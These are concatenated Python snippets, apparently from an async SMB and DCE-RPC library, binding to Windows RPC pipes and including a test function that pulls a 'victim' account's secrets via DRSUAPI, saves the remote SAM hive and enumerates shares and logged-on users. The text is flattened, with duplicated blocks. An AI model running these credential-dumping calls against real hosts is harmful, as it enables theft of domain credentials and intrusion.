async def connect(self, open = True): rpctransport = SMBTransport(self.connection, filename=r'\svcctl') self.dce = rpctransport.get_dce_rpc() await self.dce.connect() await self.dce.bind(scmr.MSRPC_UUID_SCMR) if open == True: await self.open()
async def connect(self, open=True): for i in range(2): try: rpctransport = SMBTransport(self.connection, filename=r'\samr') self.dce = rpctransport.get_dce_rpc() await self.dce.connect() await self.dce.bind(samr.MSRPC_UUID_SAMR) if open == True: await self.open() except Exception as e: print(e)
async def connect(self, open = False): for i in range(2): try: rpctransport = SMBTransport(self.connection, filename=r'\winreg') self.dce = rpctransport.get_dce_rpc() await self.dce.connect() await self.dce.bind(rrp.MSRPC_UUID_RRP) if open == True: await self.open() except Exception as e: print(e)
async def filereader_test(connection_string, filename): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() try: t = SMBDRSUAPI(connection, 'TEST.corp') await t.connect() await t.open() input('open succsess!') await t.get_user_secrets('victim') except Exception as e: import traceback traceback.print_exc() print('Error! %s' % e) return tmpFileName = os.urandom(4).hex() + '.tmp' rreg = SMBRemoteRegistryService(connection) await rreg.save_hive('SAM', tmpFileName) print('Success! Registry file should be in %s' % ('SYSTEM32\\' + tmpFileName)) await rreg.close() return rpctransport = SMBTransport(connection, filename=r'\srvsvc') dce = rpctransport.get_dce_rpc() await dce.connect() await dce.bind(srvs.MSRPC_UUID_SRVS) resp = await srvs.hNetrShareEnum(dce, 1) print(resp['InfoStruct']['ShareInfo']['Level1']['Buffer']) rpctransport = SMBTransport(connection, filename=r'\wkssvc') dce = rpctransport.get_dce_rpc() await dce.connect() await dce.bind(wkst.MSRPC_UUID_WKST) resp = await wkst.hNetrWkstaUserEnum(dce, 1) print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']) rpctransport = SMBTransport(connection, filename=r'\wkssvc') dce = rpctransport.get_dce_rpc() await dce.connect() await dce.bind(wkst.MSRPC_UUID_WKST) resp = await wkst.hNetrWkstaUserEnum(dce, 1) print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer'])
def DCERPCTransportFactory(stringbinding, connection): sb = DCERPCStringBinding(stringbinding, connection) na = sb.get_network_address() ps = sb.get_protocol_sequence() if 'ncadg_ip_udp' == ps: raise Exception('Not Implemented!') #port = sb.get_endpoint() #if port: # return UDPTransport(na, int(port)) #else: # return UDPTransport(na) elif 'ncacn_ip_tcp' == ps: port = sb.get_endpoint() if port: return TCPTransport(connection, na, int(port)) else: return TCPTransport(connection, na) elif 'ncacn_http' == ps: raise Exception('Not Implemented!') #port = sb.get_endpoint() #if port: # return HTTPTransport(na, int(port)) #else: # return HTTPTransport(na) elif 'ncacn_np' == ps: named_pipe = sb.get_endpoint() if named_pipe: named_pipe = named_pipe[len(r'\pipe'):] return SMBTransport(connection, na, filename=named_pipe) else: return SMBTransport(connection, na) elif 'ncalocal' == ps: raise Exception('Not Implemented!') #named_pipe = sb.get_endpoint() #return LOCALTransport(filename = named_pipe) else: raise DCERPCException("Unknown protocol sequence.")
async def connect(self, open=True): rpctransport = SMBTransport(self.connection, filename=r'\srvsvc') self.dce = rpctransport.get_dce_rpc() await self.dce.connect() await self.dce.bind(srvs.MSRPC_UUID_SRVS)
async def connect(self, open=True): rpctransport = SMBTransport(self.connection, filename=r'\lsarpc') self.dce = rpctransport.get_dce_rpc() await self.dce.connect() await self.dce.bind(lsad.MSRPC_UUID_LSAD)